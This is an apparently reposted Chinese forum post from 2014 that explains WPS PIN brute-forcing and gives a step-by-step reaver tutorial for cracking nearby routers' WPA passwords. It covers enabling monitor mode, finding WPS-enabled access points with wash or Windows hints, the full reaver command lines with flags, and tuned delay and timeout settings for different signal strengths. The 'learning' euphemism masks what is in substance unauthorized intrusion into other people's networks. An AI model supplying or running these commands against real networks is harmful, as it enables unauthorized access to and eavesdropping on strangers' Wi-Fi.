特别声明:本帖为转载分享帖,非本人原创,只因为之前出的帖子网友对reaver命令以及对方无线AP是否可pin存在疑问,故借用此贴予以说明!
PIN码破解简单解释: PIN码分前4和后4,先破前4只有最多一万个组合,破后4中的前3只有一千个组 合,一共就是一万一千个密码组合。 10的4次方+10的3次方=11000个密码组合。 当reaver确定前4位PIN密码后,其任务进度数值将直接跳跃至90.9%以上,也就是 说只剩余一千个密码组合了。总共一万一千个密码! 学习过程 1.在虚拟机找到点击打开。如果电脑装有多个无线网卡,请先发指令 ifconfig -a 确认你用哪一个网卡WLAN0或是WLAN1 (下面的指令都是以单一网卡WLAN0为例) 2.出现root Shell窗口。敲入第一条命令“ifconfig wlan0 up” 加载 usb网卡。
接下来“airmon-ng start wlan0” 监听模式已激活到了 mon0。
如果出现网卡没有正确加载,8187驱动RF-kill的参考后记1解决问题。 3.第二条命令“airodump-ng mon0” 查看周边路由 /AP的信息。 记录下你要学习的路由MAC地址。提供几个查看可以使用PIN码学习路由的方法。 特别提示:只有AP开启了WPS、QSS功能,才可以用PIN法学习PSK密码!如何查看 AP是否开了WPS、QSS呢提供几个小方法? a) reaver1.3下使用使用命令walsh -imon0-C 查看针对xiaopangOS3.2版本 b) reaver1.4下用新的指令:WASH -i mon0 -C C是大写在wps locked一项中有显示的。 c) WIN7下,用通常的方式连接AP,如果在提示输入密码框下面,出现“通过按路由器 按钮也可以连接”,就确认此AP开了WPS、QSS。 d) 在螃蟹软件中——可用网络——模式下带N,G的这个不是很准 最准确的是下面这个选项
点击PIN输入配置,选择接入点,哈哈出来了吧,这里面都是可以学习的目标
需要注意的是,查看后面有的是不支持pin码连接的,这样的就别弄了,后果你知道。
1. 重新开启一个root Shell窗口,第三条命令“reaver -i mon0 -b MAC -a -S -vv” 抓PIN
码。注意,MAC中冒号不可省略,MAC地址的字母大小写均可,-S是大写字母, -vv
是两个V不是W!# _) }
-i 监听后接口名称
-b 目标mac地
-a 自动检测目标AP最佳配
-S 使用最小的DH key(可以提高破解速度)
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
-c指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9参数防止路由僵死
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
小结-学习时应因状况调整参数(-c后面都已目标频道为1作为例子
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t .5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
学习开始了,然后就是漫长的等待。
如果信号好的话2-4小时内进度走到100%你就会有惊喜发现。
| 
雷达卡
发表于 2014-6-3 01:28:26
提升卡
置顶卡
沉默卡
变色卡
显身卡